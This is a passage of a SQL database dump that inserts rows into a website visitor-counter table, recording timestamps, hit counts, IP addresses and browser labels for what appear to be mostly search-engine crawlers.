,0,0,'87.250.224.46','other'),(282640,1533427375,1,1,0,0,'54.36.149.70','other'),(282641,1533427570,1,1,0,0,'54.36.148.87','other'),(282642,1533427625,1,0,1,0,'66.249.66.157',''),(282643,1533427779,1,1,0,0,'54.36.148.55','other'),(282644,1533427832,1,1,0,0,'66.249.66.155','chrome'),(282645,1533427875,1,1,0,0,'178.154.171.88','other'),(282646,1533428138,1,1,0,0,'145.239.90.27','other'),(282647,1533428198,1,1,0,0,'54.36.149.10','other'),(282648,1533428510,1,1,0,0,'54.36.148.119','other'),(282649,1533428525,1,1,0,0,'54.36.148.240','other'),(282650,1533428781,1,1,0,0,'95.163.255.163','other'),(282651,1533428898,3,3,0,0,'216.244.66.241','other'),(282652,1533428936,1,1,0,0,'54.36.148.107','other'),(282653,1533429130,1,1,0,0,'54.36.148.59','other'),(282654,1533429172,1,1,0,0,'54.36.149.60','other'),(282655,1533429185,1,1,0,0,'54.36.149.77','other'),(282656,1533429317,1,1,0,0,'95.163.255.151','other'),(282657,1533429408,1,1,0,0,'54.36.148.215','other'),(282658,1533429429,3,3,0,0,'141.8.142.74','other'),(282659,1533429451,1,1,0,0,'54.36.148.32','other'),(282660,1533429738,1,1,0,0,'178.154.171.88','other'),(282661,1533429776,1,1,0,0,'8.29.198.25','other'),(282662,1533430034,1,1,0,0,'54.36.148.126','other'),(282663,1533430153,1,1,0,0,'54.36.148.45','other'),(282664,1533430168,1,1,0,0,'54.36.148.94','other'),(282665,1533430195,1,1,0,0,'54.36.149.100','other'),(282666,1533430257,1,1,0,0,'54.36.149.57','other'),(282667,1533430404,1,1,0,0,'54.36.149.27','other'),(282668,1533431007,1,1,0,0,'54.36.148.162','other'),(282669,1533431049,1,1,0,0,'54.36.148.108','other'),(282670,1533431380,1,1,0,0,'8.29.198.25','other'),(282671,1533431463,1,1,0,0,'54.36.148.200','other'),(282672,1533431739,1,1,0,0,'89.31.57.5','other'),(282673,1533431826,1,1,0,0,'54.36.149.2','other'),(282674,1533432045,1,1,0,0,'54.36.148.241','other'),(282675,1533432937,1,1,0,0,'54.36.148.225','other'),(282676,1533433124,1,1,0,0,'54.36.148.243','other'),(282677,1533433163,1,1,0,0,'37.204.152.245','msie'),(282678,1533433168,1,0,1,0,'66.249.66.156',''),(282679,1533433266,1,1,0,0,'54.36.148.83','other'),(282680,1533433382,1,1,0,0,'54.36.148.197','other'),(282681,1533433419,1,1,0,0,'87.250.224.46','other'),(282682,1533433523,1,1,0,0,'52.34.24.33','chrome'),(282683,1533433526,1,1,0,0,'54.36.149.103','other'),(282684,1533433654,1,1,0,0,'54.36.148.70','other'),(282685,1533433719,2,2,0,0,'216.244.66.241','other'),(282686,1533433973,3,3,0,0,'207.46.13.36','other'),(282687,1533433979,4,4,0,0,'40.77.167.114','other'),(282688,1533433987,4,4,0,0,'207.46.13.188','other'),(282689,1533434091,1,1,0,0,'141.8.142.74','other'),(282690,1533434185,2,2,0,0,'178.154.171.88','other'),(282691,1533434249,1,1,0,0,'54.36.149.75','other'),(282692,1533434581,1,1,0,0,'54.36.148.187','other'),(282693,1533434676,1,1,0,0,'54.36.148.191','other'),(282694,1533434788,1,1,0,0,'54.36.148.232','other'),(282695,1533434894,1,1,0,0,'54.36.148.220','other'),(282696,1533435093,1,1,0,0,'54.36.149.66','other'),(282697,1533435103,1,1,0,0,'54.36.149.87','other'),(282698,1533435323,1,1,0,0,'54.36.113.126','other'),(282699,1533435328,1,1,0,0,'54.36.149.38','other'),(282700,1533435351,1,1,0,0,'54.36.149.18','other'),(282701,1533435445,2,2,0,0,'54.36.148.60','other'),(282702,1533435516,1,0,1,0,'66.249.66.59',''),(282703,1533435653,1,1,0,0,'178.154.171.88','other'),(282704,1533435656,1,1,0,0,'54.36.148.230','other'),(282705,1533436067,1,1,0,0,'54.36.148.213','other'),(282706,1533436514,23,23,0,0,'144.76.14.153','other'),(282707,1533436559,1,1,0,0,'54.36.149.45','other'),(282708,1533437118,1,1,0,0,'216.244.66.241','other'),(282709,1533437300,1,1,0,0,'54.36.149.104','other'),(282710,1533437372,1,1,0,0,'54.36.148.253','other'),(282711,1533437396,1,1,0,0,'54.36.148.65','other'),(282712,1533437447,1,1,0,0,'54.36.148.169','other'),(282713,1533437472,1,1,0,0,'54.36.148.225','other'),(282714,1533437605,1,1,0,0,'54.36.148.37','other'),(282715,1533437704,1,1,0,0,'54.36.148.182','other'),(282716,1533437717,1,1,0,0,'54.36.148.121','other'),(282717,1533437864,1,1,0,0,'54.36.149.60','other'),(282718,1533438138,1,1,0,0,'54.36.148.144','other'),(282719,1533438355,1,1,0,0,'207.46.13.36','other'),(282720,1533438450,1,1,0,0,'54.36.149.13','other'),(282721,1533438702,1,1,0,0,'87.250.224.46','other'),(282722,1533438732,1,1,0,0,'141.8.142.74','other'),(282723,1533438760,1,1,0,0,'178.154.171.88','other'),(282724,1533438812,1,1,0,0,'54.36.149.107','other'),(282725,1533438916,2,2,0,0,'216.244.66.241','other'),(282726,1533438925,1,1,0,0,'185.100.87.207','other'),(282727,1533439222,1,0,1,0,'66.249.66.157',''),(282728,1533439570,1,1,0,0,'54.36.149.37','other'),(282729,1533439818,1,1,0,0,'54.36.148.231','other'),(282730,1533440327,1,1,0,0,'54.36.148.185','other'),(282731,1533440507,1,1,0,0,'54.36.148.181','other'),(282732,1533440526,1,1,0,0,'141.8.142.74','other'),(282733,1533440616,1,1,0,0,'8.29.198.25','other'),(282734,1533440675,1,1,0,0,'54.36.148.164','other'),(282735,1533440705,1,1,0,0,'54.36.148.78','other'),(282736,1533440817,1,1,0,0,'54.36.149.41','other'),(282737,1533440977,1,1,0,0,'54.36.149.5','other'),(282738,1533440981,1,1,0,0,'54.36.148.212','other'),(282739,1533441221,1,1,0,0,'54.36.148.114','other'),(282740,1533441360,3,3,0,0,'216.244.66.241','other'),(282741,1533441385,1,1,0,0,'54.36.148.76','other'),(282742,1533441404,1,1,0,0,'207.46.13.36','other'),(282743,1533441463,1,1,0,0,'157.55.39.190','other'),(282744,1533441483,1,1,0,0,'54.36.148.58','other'),(282745,1533441504,1,0,1,0,'66.249.66.156',''),(282746,1533441566,1,1,0,0,'54.36.148.191','other'),(282747,1533441623,1,1,0,0,'54.36.149.21','other'),(282748,1533441779,1,1,0,0,'37.9.113.134','other'),(282749,1533442223,1,1,0,0,'8.29.198.26','other'),(282750,1533442523,1,1,0,0,'54.36.148.123','other'),(282751,1533442525,1,1,0,0,'216.244.66.241','other'),(282752,1533442533,1,1,0,0,'176.31.208.193','other'),(282753,1533442549,1,1,0,0,'54.36.148.101','other'),(282754,1533442703,1,1,0,0,'54.36.148.91','other'),(282755,1533442725,1,1,0,0,'66.249.66.61','chrome'),(282756,1533442985,1,1,0,0,'54.36.148.176','other'),(282757,1533443966,5,5,0,0,'216.244.66.241','other'),(282758,1533444169,1,1,0,0,'54.36.149.27','other'),(282759,1533444195,1,1,0,0,'54.36.148.16','other'),(282760,1533444382,1,1,0,0,'54.36.148.169','other'),(282761,1533444512,1,1,0,0,'51.255.65.46','other'),(282762,1533444665,1,1,0,0,'54.36.148.162','other'),(282763,1533444834,1,1,0,0,'54.36.149.23','other'),(282764,1533445089,1,1,0,0,'54.36.148.107','other'),(282765,1533445152,1,0,1,0,'66.249.66.156',''),(282766,1533445266,1,1,0,0,'54.36.148.119','other'),(282767,1533445291,1,0,1,0,'66.249.66.59',''),(282768,1533445292,1,1,0,0,'54.36.148.101','other'),(282769,1533445306,1,1,0,0,'54.36.148.61','other'),(282770,1533445401,1,1,0,0,'54.36.148.245','other'),(282771,1533445776,1,1,0,0,'54.36.149.105','other'),(282772,1533445821,1,1,0,0,'54.36.148.111','other'),(282773,1533446131,1,1,0,0,'85.248.227.164','other'),(282774,1533446249,1,1,0,0,'54.36.148.77','other'),(282775,1533446426,5,5,0,0,'216.244.66.241','other'),(282776,1533446626,1,1,0,0,'54.36.148.163','other'),(282777,1533446880,1,1,0,0,'54.36.148.24','other'),(282778,1533447089,1,1,0,0,'54.36.149.17','other'),(282779,1533447399,1,1,0,0,'54.36.148.172','other'),(282780,1533447586,1,1,0,0,'54.36.148.13','other'),(282781,1533447631,1,1,0,0,'54.36.148.30','other'),(282782,1533447902,1,1,0,0,'54.36.148.203','other'),(282783,1533448028,1,1,0,0,'54.36.148.19','other'),(282784,1533448360,1,0,1,0,'66.249.66.157',''),(282785,1533448428,1,1,0,0,'66.249.66.155','chrome'),(282786,1533448517,1,1,0,0,'54.36.149.71','other'),(282787,1533448617,1,1,0,0,'54.36.148.59','other'),(282788,1533448682,1,1,0,0,'66.249.66.57','chrome'),(282789,1533448831,1,1,0,0,'37.9.113.182','other'),(282790,1533448975,2,2,0,0,'141.8.142.74','other'),(282791,1533449133,1,1,0,0,'54.36.148.74','other'),(282792,1533449443,1,1,0,0,'54.36.149.7','other'),(282793,1533449570,1,1,0,0,'54.36.148.88','other'),(282794,1533449913,1,1,0,0,'54.36.148.50','other'),(282795,1533449986,1,1,0,0,'54.36.148.53','other'),(282796,1533449998,1,1,0,0,'54.36.149.19','other'),(282797,1533450281,1,1,0,0,'54.36.148.185','other'),(282798,1533450302,2,2,0,0,'178.154.171.88','other'),(282799,1533450401,1,1,0,0,'54.36.148.99','other'),(282800,1533450417,1,1,0,0,'54.36.148.251','other'),(282801,1533450487,1,1,0,0,'141.8.142.74','other'),(282802,1533450505,1,1,0,0,'54.36.148.90','other'),(282803,1533450804,1,0,1,0,'66.249.66.156',''),(282804,1533450963,1,1,0,0,'54.36.148.108','other'),(282805,1533451444,1,1,0,0,'8.29.198.26','other'),(282806,1533451501,1,1,0,0,'54.36.149.87','other'),(282807,1533451559,1,1,0,0,'178.154.171.88','other'),(282808,1533451626,1,1,0,0,'54.36.148.217','other'),(282809,1533451869,1,1,0,0,'54.36.148.38','other'),(282810,1533452194,1,0,1,0,'66.249.66.156',''),(282811,1533452226,1,0,1,0,'66.249.66.157',''),(282812,1533452298,1,1,0,0,'54.36.148.32','other'),(282813,1533452607,1,1,0,0,'54.36.149.22','other'),(282814,1533452746,1,1,0,0,'66.249.66.156','chrome'),(282815,1533452774,1,1,0,0,'54.36.148.48','other'),(282816,1533452993,1,1,0,0,'54.36.149.28','other'),(282817,1533453002,1,1,0,0,'54.36.148.77','other'),(282818,1533453063,1,1,0,0,'8.29.198.25','other'),(282819,1533453127,1,1,0,0,'54.36.149.52','other'),(282820,1533453173,1,1,0,0,'66.249.66.155','chrome'),(282821,1533453174,1,1,0,0,'141.8.142.74','other'),(282822,1533453323,1,1,0,0,'185.220.102.7','other'),(282823,1533453446,2,2,0,0,'54.36.148.75','other'),(282824,1533453725,2,2,0,0,'216.244.66.241','other'),(282825,1533453801,1,0,1,0,'66.249.66.156',''),(282826,1533453908,1,1,0,0,'54.36.148.40','other'),(282827,1533454090,1,1,0,0,'54.36.149.34','other'),(282828,1533454152,1,1,0,0,'54.36.148.206','other'),(282829,1533454399,1,1,0,0,'54.36.148.37','other'),(282830,1533454403,1,1,0,0,'54.36.148.117','other'),(282831,1533454436,1,1,0,0,'54.36.148.125','other'),(282832,1533454620,1,1,0,0,'185.102.184.100','chrome'),(282833,1533454737,1,1,0,0,'216.244.66.241','other'),(282834,1533454983,1,1,0,0,'54.36.148.174','other'),(282835,1533455013,1,1,0,0,'54.36.149.101','other'),(282836,1533455084,1,1,0,0,'141.8.142.74','other'),(282837,1533455214,1,1,0,0,'54.36.149.9','other'),(282838,1533455673,1,1,0,0,'54.36.148.93','other'),(282839,1533456176,1,1,0,0,'95.163.255.152','other'),(282840,1533456287,1,1,0,0,'66.249.66.157','chrome'),(282841,1533456302,1,1,0,0,'66.249.66.57','chrome'),(282842,1533456456,1,1,0,0,'54.36.148.169','other'),(282843,1533456680,1,1,0,0,'54.36.148.38','other'),(282844,1533456726,1,1,0,0,'54.36.148.52','other'),(282845,1533456873,1,1,0,0,'54.36.148.124','other'),(282846,1533457073,1,1,0,0,'54.36.148.67','other'),(282847,1533457305,1,1,0,0,'207.46.13.188','other'),(282848,1533458360,1,1,0,0,'54.36.148.66','other'),(282849,1533458613,1,1,0,0,'54.36.149.73','other'),(282850,1533458619,1,1,0,0,'54.36.149.106','other'),(282851,1533458688,1,1,0,0,'54.36.148.41','other'),(282852,1533458910,10,10,0,0,'23.237.4.26','other'),(282853,1533459087,2,0,2,0,'66.249.66.155',''),(282854,1533459114,1,1,0,0,'54.36.149.13','other'),(282855,1533459206,1,1,0,0,'54.36.148.199','other'),(282856,1533459490,1,1,0,0,'157.55.39.190','other'),(282857,1533459499,1,1,0,0,'95.163.255.150','other'),(282858,1533459615,1,0,1,0,'66.249.66.156',''),(282859,1533459734,1,1,0,0,'54.36.148.138','other'),(282860,1533460340,1,1,0,0,'54.36.148.22','other'),(282861,1533460343,1,1,0,0,'54.36.149.12','other'),(282862,1533460409,1,1,0,0,'54.36.148.37','other'),(282863,1533460528,1,1,0,0,'185.248.160.214','other'),(282864,1533460832,1,1,0,0,'54.36.148.168','other'),(282865,1533460893,1,1,0,0,'54.36.149.100','other'),(282866,1533461533,1,1,0,0,'178.154.200.41','other'),(282867,1533461649,1,1,0,0,'54.36.148.147','other'),(282868,1533461653,1,1,0,0,'216.244.66.241','other'),(282869,1533461822,1,0,1,0,'66.249.66.157',''),(282870,1533461866,1,0,1,0,'66.249.66.156',''),(282871,1533462278,1,1,0,0,'8.29.198.25','other'),(282872,1533462371,1,1,0,0,'54.36.148.169','other'),(282873,1533462489,1,1,0,0,'54.36.148.24','other'),(282874,1533462505,2,2,0,0,'54.36.148.130','other'),(282875,1533462554,1,0,1,0,'66.249.66.155',''),(282876,1533462866,1,1,0,0,'54.36.148.59','other'),(282877,1533462942,1,1,0,0,'54.36.149.24','other'),(282878,1533463012,1,1,0,0,'66.249.66.61','chrome'),(282879,1533463096,1,1,0,0,'54.36.148.85','other'),(282880,1533463216,1,1,0,0,'54.36.148.125','other'),(282881,1533463417,1,1,0,0,'157.55.39.190','other'),(282882,1533463748,1,1,0,0,'54.36.148.11','other'),(282883,1533463812,1,1,0,0,'54.36.148.129','other'),(282884,1533463870,1,1,0,0,'54.36.148.104','other'),(282885,1533463902,1,1,0,0,'8.29.198.27','other'),(282886,1533464062,1,1,0,0,'92.113.189.235','chrome'),(282887,1533464155,1,1,0,0,'46.166.129.156','other'),(282888,1533464245,1,1,0,0,'54.36.148.113','other'),(282889,1533464327,5,5,0,0,'216.244.66.241','other'),(282890,1533464351,1,1,0,0,'54.36.148.255','other'),(282891,1533464561,1,1,0,0,'54.36.148.121','other'),(282892,1533464632,1,1,0,0,'54.36.149.67','other'),(282893,1533464667,1,1,0,0,'54.36.148.114','other'),(282894,1533464809,1,1,0,0,'54.36.148.162','other'),(282895,1533464949,1,1,0,0,'54.36.148.42','other'),(282896,1533464986,1,1,0,0,'54.36.148.87','other'),(282897,1533464994,1,1,0,0,'54.36.148.56','other'),(282898,1533465004,2,2,0,0,'108.59.8.70','other'),(282899,1533465091,1,1,0,0,'54.36.149.62','other'),(282900,1533465129,1,1,0,0,'54.36.148.195','other'),(282901,1533465322,1,1,0,0,'54.36.148.57','other'),(282902,1533465334,1,1,0,0,'54.36.148.24','other'),(282903,1533465482,1,1,0,0,'54.36.148.135','other'),(282904,1533465509,1,1,0,0,'54.36.149.89','other'),(282905,1533465517,1,1,0,0,'54.36.148.34','other'),(282906,1533466390,1,1,0,0,'54.36.148.63','other'),(282907,1533466426,1,1,0,0,'5.45.207.83','other'),(282908,1533466471,1,1,0,0,'216.244.66.241','other'),(282909,1533466492,1,1,0,0,'54.36.149.44','other'),(282910,1533466646,1,1,0,0,'54.36.149.5','other'),(282911,1533466737,4,1,3,0,'66.249.66.155',''),(282912,1533466765,3,3,0,0,'141.8.142.74','other'),(282913,1533466813,1,1,0,0,'54.36.149.96','other'),(282914,1533467086,1,1,0,0,'54.36.149.33','other'),(282915,1533467297,1,1,0,0,'54.36.148.130','other'),(282916,1533467320,1,0,1,0,'66.249.66.157',''),(282917,1533467493,1,1,0,0,'54.36.148.62','other'),(282918,1533467644,1,1,0,0,'87.250.224.46','other'),(282919,1533467688,1,1,0,0,'141.8.142.74','other'),(282920,1533467762,1,1,0,0,'95.216.15.180','other'),(282921,1533468244,1,1,0,0,'54.36.148.116','other'),(282922,1533468541,1,1,0,0,'54.36.149.63','other'),(282923,1533468768,1,1,0,0,'54.36.148.249','other'),(282924,1533468795,1,1,0,0,'54.36.148.13','other'),(282925,1533468917,1,1,0,0,'95.163.255.97','other'),(282926,1533469285,1,1,0,0,'54.36.148.248','other'),(282927,1533469412,1,1,0,0,'66.249.66.57','chrome'),(282928,1533469485,1,1,0,0,'54.36.148.122','other'),(282929,1533469519,1,1,0,0,'54.36.148.142','other'),(282930,1533469629,1,1,0,0,'54.36.149.37','other'),(282931,1533469677,1,1,0,0,'95.135.130.181','firefox'),(282932,1533469802,1,1,0,0,'54.36.148.206','other'),(282933,1533469819,1,1,0,0,'54.36.148.201','other'),(282934,1533469867,1,1,0,0,'141.8.142.74','other'),(282935,1533469990,1,1,0,0,'54.36.149.51','other'),(282936,1533470024,1,1,0,0,'54.36.148.217','other'),(282937,1533470031,1,1,0,0,'54.36.148.197','other'),(282938,1533470127,1,1,0,0,'54.36.148.18','other'),(282939,1533470161,1,1,0,0,'54.36.148.62','other'),(282940,1533470554,1,1,0,0,'54.36.148.187','other'),(282941,1533470578,1,1,0,0,'54.36.149.13','other'),(282942,1533470643,1,1,0,0,'54.36.148.20','other'),(282943,1533470654,1,1,0,0,'54.36.149.1','other'),(282944,1533471097,1,1,0,0,'54.36.149.36','other'),(282945,1533471145,1,1,0,0,'54.36.149.67','other'),(282946,1533471241,1,1,0,0,'54.36.148.141','other'),(282947,1533471309,1,1,0,0,'54.36.149.53','other'),(282948,1533471343,1,1,0,0,'185.220.102.7','other'),(282949,1533471599,1,1,0,0,'54.36.148.180','other'),(282950,1533471687,1,1,0,0,'54.36.149.27','other'),(282951,1533471705,1,1,0,0,'54.36.148.119','other'),(282952,1533471731,2,0,2,0,'66.249.66.155',''),(282953,1533471857,1,1,0,0,'54.36.148.75','other'),(282954,1533471916,1,1,0,0,'54.36.149.50','other'),(282955,1533471956,1,1,0,0,'141.8.142.74','other'),(282956,1533472020,1,1,0,0,'178.95.194.215','firefox'),(282957,1533472202,3,3,0,0,'216.244.66.241','other'),(282958,1533472414,1,1,0,0,'54.36.148.167','other'),(282959,1533472614,1,1,0,0,'54.36.148.210','other'),(282960,1533472993,3,3,0,0,'141.8.142.74','other'),(282961,1533473118,1,1,0,0,'8.29.198.27','other'),(282962,1533473214,1,1,0,0,'54.36.149.69','other'),(282963,1533473374,1,1,0,0,'54.36.148.81','other'),(282964,1533473490,1,1,0,0,'91.196.178.98','chrome'),(282965,1533473531,1,0,1,0,'66.249.66.61',''),(282966,1533473578,1,0,1,0,'66.249.66.57',''),(282967,1533474061,1,1,0,0,'54.36.148.225','other'),(282968,1533474119,4,4,0,0,'216.244.66.241','other'),(282969,1533474250,1,1,0,0,'54.36.148.64','other'),(282970,1533474323,1,0,1,0,'66.249.66.155',''),(282971,1533474398,1,1,0,0,'54.36.148.12','other'),(282972,1533474758,1,1,0,0,'8.29.198.26','other'),(282973,1533474890,1,0,1,0,'66.249.66.157',''),(282974,1533474963,1,1,0,0,'145.239.91.37','other'),(282975,1533475004,1,1,0,0,'54.36.148.167','other'),(282976,1533475029,1,1,0,0,'141.8.142.74','other'),(282977,1533475039,1,1,0,0,'54.36.149.15','other'),(282978,1533475210,1,1,0,0,'54.36.148.205','other'),(282979,1533475211,1,1,0,0,'54.36.148.116','other'),(282980,1533475229,1,1,0,0,'216.244.66.241','other'),(282981,1533475260,1,1,0,0,'54.36.148.209','other'),(282982,1533475282,1,1,0,0,'54.36.148.226','other'),(282983,1533475567,1,1,0,0,'51.255.65.46','other'),(282984,1533475569,1,1,0,0,'54.36.149.65','other'),(282985,1533475621,1,1,0,0,'54.36.148.237','other'),(282986,1533475994,1,1,0,0,'54.36.148.194','other'),(282987,1533476860,1,1,0,0,'54.36.149.37','other'),(282988,1533476863,1,1,0,0,'178.154.171.88','other'),(282989,1533476909,1,1,0,0,'54.36.148.190','other'),(282990,1533476921,1,1,0,0,'54.36.149.63','other'),(282991,1533477087,1,1,0,0,'54.36.149.18','other'),(282992,1533477243,1,1,0,0,'54.36.149.60','other'),(282993,1533477317,1,1,0,0,'37.9.113.182','other'),(282994,1533477365,1,1,0,0,'54.36.148.47','other'),(282995,1533477621,1,1,0,0,'141.8.142.74','other'),(282996,1533477828,1,1,0,0,'54.36.148.46','other'),(282997,1533477854,1,1,0,0,'216.244.66.241','other'),(282998,1533477903,1,1,0,0,'54.36.148.55','other'),(282999,1533478193,1,1,0,0,'54.36.148.248','other'),(283000,1533478194,1,1,0,0,'54.36.148.41','other'),(283001,1533478402,1,1,0,0,'178.62.208.24','chrome'),(283002,1533478423,1,1,0,0,'54.36.149.6','other'),(283003,1533478545,1,1,0,0,'62.141.37.236','other'),(283004,1533478576,1,1,0,0,'54.36.149.89','other'),(283005,1533478732,1,1,0,0,'54.36.148.71','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (283006,1533478840,1,1,0,0,'54.36.148.90','other'),(283007,1533479039,1,1,0,0,'54.36.148.45','other'),(283008,1533479053,1,1,0,0,'91.79.15.193','chrome'),(283009,1533479094,1,1,0,0,'54.36.148.145','other'),(283010,1533479235,1,1,0,0,'54.36.148.18','other'),(283011,1533479245,1,1,0,0,'54.36.149.8','other'),(283012,1533479410,1,1,0,0,'54.36.148.99','other'),(283013,1533479419,2,2,0,0,'141.8.142.74','other'),(283014,1533479502,1,1,0,0,'54.36.148.251','other'),(283015,1533479584,1,1,0,0,'54.36.148.188','other'),(283016,1533479681,1,1,0,0,'54.36.148.128','other'),(283017,1533479695,1,1,0,0,'54.36.148.170','other'),(283018,1533479938,3,3,0,0,'216.244.66.241','other'),(283019,1533480013,1,1,0,0,'54.36.148.235','other'),(283020,1533480190,1,1,0,0,'54.36.149.102','other'),(283021,1533480362,1,1,0,0,'54.36.149.19','other'),(283022,1533480379,1,1,0,0,'54.36.149.55','other'),(283023,1533480425,1,1,0,0,'141.8.142.74','other'),(283024,1533480456,1,1,0,0,'54.36.149.59','other'),(283025,1533480556,1,1,0,0,'66.249.66.59','chrome'),(283026,1533480589,1,1,0,0,'54.36.149.64','other'),(283027,1533480710,1,1,0,0,'54.36.149.61','other'),(283028,1533480759,1,1,0,0,'54.36.149.16','other'),(283029,1533480955,1,1,0,0,'54.36.149.83','other'),(283030,1533481013,1,1,0,0,'54.36.148.172','other'),(283031,1533481110,25,25,0,0,'157.55.39.190','other'),(283032,1533481117,1,1,0,0,'54.36.148.200','other'),(283033,1533481158,1,1,0,0,'216.244.66.241','other'),(283034,1533481229,14,14,0,0,'207.46.13.188','other'),(283035,1533481445,1,1,0,0,'95.163.255.99','other'),(283036,1533481446,1,1,0,0,'54.36.148.176','other'),(283037,1533481447,1,1,0,0,'95.163.255.97','other'),(283038,1533481620,1,1,0,0,'54.36.149.10','other'),(283039,1533481624,1,1,0,0,'66.102.9.35','chrome'),(283040,1533481654,1,1,0,0,'54.36.149.18','other'),(283041,1533481794,1,1,0,0,'54.36.148.171','other'),(283042,1533481822,1,1,0,0,'54.36.148.86','other'),(283043,1533481929,1,1,0,0,'54.36.148.92','other'),(283044,1533482029,1,1,0,0,'54.36.148.35','other'),(283045,1533482060,1,1,0,0,'54.36.148.127','other'),(283046,1533482062,3,3,0,0,'216.244.66.241','other'),(283047,1533482091,1,1,0,0,'54.36.148.180','other'),(283048,1533482264,1,1,0,0,'54.36.148.96','other'),(283049,1533482385,1,1,0,0,'178.154.171.88','other'),(283050,1533482400,1,1,0,0,'141.8.142.74','other'),(283051,1533482765,1,1,0,0,'128.68.131.207','chrome'),(283052,1533482917,1,1,0,0,'54.36.148.108','other'),(283053,1533482931,1,1,0,0,'54.36.148.159','other'),(283054,1533483183,1,1,0,0,'54.36.148.46','other'),(283055,1533483186,1,1,0,0,'54.36.148.140','other'),(283056,1533483219,1,1,0,0,'54.36.149.8','other'),(283057,1533483329,1,1,0,0,'54.36.149.79','other'),(283058,1533483571,1,1,0,0,'54.36.148.52','other'),(283059,1533483951,1,1,0,0,'8.29.198.27','other'),(283060,1533484086,1,1,0,0,'54.36.148.127','other'),(283061,1533484108,1,1,0,0,'54.36.149.93','other'),(283062,1533484294,1,1,0,0,'54.36.148.117','other'),(283063,1533484371,1,1,0,0,'54.36.148.99','other'),(283064,1533484612,1,1,0,0,'157.55.39.190','other'),(283065,1533484818,1,1,0,0,'185.4.41.87','firefox'),(283066,1533485071,1,1,0,0,'54.36.148.212','other'),(283067,1533485083,1,1,0,0,'54.36.149.15','other'),(283068,1533485497,7,7,0,0,'94.130.9.183','other'),(283069,1533485509,1,1,0,0,'95.163.255.94','other'),(283070,1533485595,1,1,0,0,'8.29.198.26','other'),(283071,1533485690,3,3,0,0,'216.244.66.241','other'),(283072,1533485781,1,1,0,0,'51.15.80.14','other'),(283073,1533485871,1,1,0,0,'54.36.148.73','other'),(283074,1533486074,1,1,0,0,'54.36.149.64','other'),(283075,1533486333,1,0,1,0,'66.249.66.155',''),(283076,1533486420,8,8,0,0,'94.130.9.183','other'),(283077,1533486816,1,1,0,0,'54.36.148.218','other'),(283078,1533486832,1,1,0,0,'54.36.149.35','other'),(283079,1533486919,1,1,0,0,'54.36.149.11','other'),(283080,1533487024,1,1,0,0,'54.36.148.88','other'),(283081,1533487039,1,1,0,0,'54.36.148.33','other'),(283082,1533487211,2,2,0,0,'54.36.149.20','other'),(283083,1533487227,1,0,1,0,'66.249.66.61',''),(283084,1533487252,1,1,0,0,'141.8.142.74','other'),(283085,1533487369,7,7,0,0,'94.130.9.183','other'),(283086,1533487503,1,1,0,0,'54.36.149.45','other'),(283087,1533487641,1,1,0,0,'54.36.149.21','other'),(283088,1533487674,1,1,0,0,'54.36.148.172','other'),(283089,1533487728,1,0,1,0,'66.249.66.155',''),(283090,1533488059,3,3,0,0,'216.244.66.241','other'),(283091,1533488106,1,1,0,0,'54.36.149.53','other'),(283092,1533488254,1,1,0,0,'54.36.148.98','other'),(283093,1533488327,1,1,0,0,'54.36.148.130','other'),(283094,1533488490,1,1,0,0,'54.36.148.164','other'),(283095,1533488521,6,6,0,0,'94.130.9.183','other'),(283096,1533488648,1,1,0,0,'54.36.148.192','other'),(283097,1533488845,1,1,0,0,'54.36.148.162','other'),(283098,1533489008,1,0,1,0,'66.249.66.155',''),(283099,1533489422,7,7,0,0,'94.130.9.183','other'),(283100,1533489628,1,1,0,0,'54.36.149.18','other'),(283101,1533489665,1,1,0,0,'54.36.148.63','other'),(283102,1533490504,5,5,0,0,'94.130.9.183','other'),(283103,1533490563,1,1,0,0,'54.36.148.56','other'),(283104,1533490815,1,1,0,0,'54.36.148.27','other'),(283105,1533490955,1,1,0,0,'54.36.148.206','other'),(283106,1533490965,1,1,0,0,'54.36.149.7','other'),(283107,1533491068,1,1,0,0,'54.36.149.32','other'),(283108,1533491159,3,3,0,0,'216.244.66.241','other'),(283109,1533491300,1,1,0,0,'92.113.189.235','chrome'),(283110,1533491331,2,2,0,0,'141.8.142.74','other'),(283111,1533491488,1,1,0,0,'54.36.148.53','other'),(283112,1533491544,1,1,0,0,'54.36.148.46','other'),(283113,1533491651,1,1,0,0,'54.36.148.114','other'),(283114,1533491776,4,4,0,0,'94.130.9.183','other'),(283115,1533491910,1,1,0,0,'54.36.148.24','other'),(283116,1533491995,1,1,0,0,'54.36.148.162','other'),(283117,1533492098,1,1,0,0,'54.36.148.166','other'),(283118,1533492110,1,1,0,0,'54.36.148.55','other'),(283119,1533492181,1,1,0,0,'178.154.171.88','other'),(283120,1533492427,1,1,0,0,'95.163.255.96','other'),(283121,1533492792,1,0,1,0,'66.249.66.156',''),(283122,1533492877,1,1,0,0,'66.249.66.156','chrome'),(283123,1533492933,6,6,0,0,'94.130.9.183','other'),(283124,1533492939,1,1,0,0,'185.220.101.5','other'),(283125,1533492983,1,1,0,0,'54.36.148.201','other'),(283126,1533493099,1,1,0,0,'66.249.66.57','chrome'),(283127,1533493522,1,1,0,0,'141.8.142.74','other'),(283128,1533493547,1,1,0,0,'54.36.149.5','other'),(283129,1533493856,6,6,0,0,'94.130.9.183','other'),(283130,1533494032,1,1,0,0,'54.36.148.139','other'),(283131,1533494232,2,2,0,0,'178.154.171.88','other'),(283132,1533494236,1,1,0,0,'54.36.148.169','other'),(283133,1533494282,1,1,0,0,'54.36.148.66','other'),(283134,1533494762,1,1,0,0,'95.163.255.179','other'),(283135,1533494764,4,4,0,0,'94.130.9.183','other'),(283136,1533494788,1,1,0,0,'8.29.198.26','other'),(283137,1533494870,1,1,0,0,'54.36.148.148','other'),(283138,1533494904,1,1,0,0,'54.36.148.189','other'),(283139,1533495008,1,1,0,0,'141.8.142.74','other'),(283140,1533495238,1,1,0,0,'54.36.148.13','other'),(283141,1533495360,1,1,0,0,'157.55.39.190','other'),(283142,1533495567,3,3,0,0,'216.244.66.241','other'),(283143,1533495726,1,1,0,0,'37.9.113.182','other'),(283144,1533495795,1,1,0,0,'54.36.148.152','other'),(283145,1533496057,1,0,1,0,'66.249.66.155',''),(283146,1533496325,1,1,0,0,'54.36.148.59','other'),(283147,1533496437,1,1,0,0,'54.36.149.8','other'),(283148,1533496439,1,1,0,0,'8.29.198.25','other'),(283149,1533496485,1,1,0,0,'178.154.171.88','other'),(283150,1533496535,1,1,0,0,'185.220.101.10','other'),(283151,1533496575,1,1,0,0,'91.196.178.46','chrome'),(283152,1533496577,1,1,0,0,'216.244.66.241','other'),(283153,1533497091,1,1,0,0,'54.36.149.91','other'),(283154,1533497104,1,1,0,0,'54.36.149.45',